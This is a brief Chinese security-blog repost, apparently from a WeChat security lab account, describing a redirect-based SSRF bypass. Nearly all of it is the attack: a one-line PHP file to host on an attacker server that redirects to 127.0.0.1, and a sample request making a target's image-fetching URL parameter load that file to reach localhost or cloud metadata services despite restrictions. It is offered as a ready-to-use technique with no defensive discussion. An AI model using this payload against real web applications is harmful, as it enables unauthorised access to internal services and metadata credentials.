重定向 SSRF 绕过

2022年3月17日01:40:07评论82 views字数 169阅读0分33秒阅读模式

重定向 SSRF 绕过

如果本地主机和元数据调用受到限制，将此Payload保存为攻击者服务器中。

<?php header('location: http://127.0.0.1');?>

http://target.com/image?url=http://attaker/1.php

原文始发于微信公众号（Khan安全攻防实验室）：重定向 SSRF 绕过

本文由 admin 发表于 2022年3月17日01:40:07
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
重定向 SSRF 绕过http://cn-sec.com/archives/830359.html

详解XSS漏洞及反射型XSS漏洞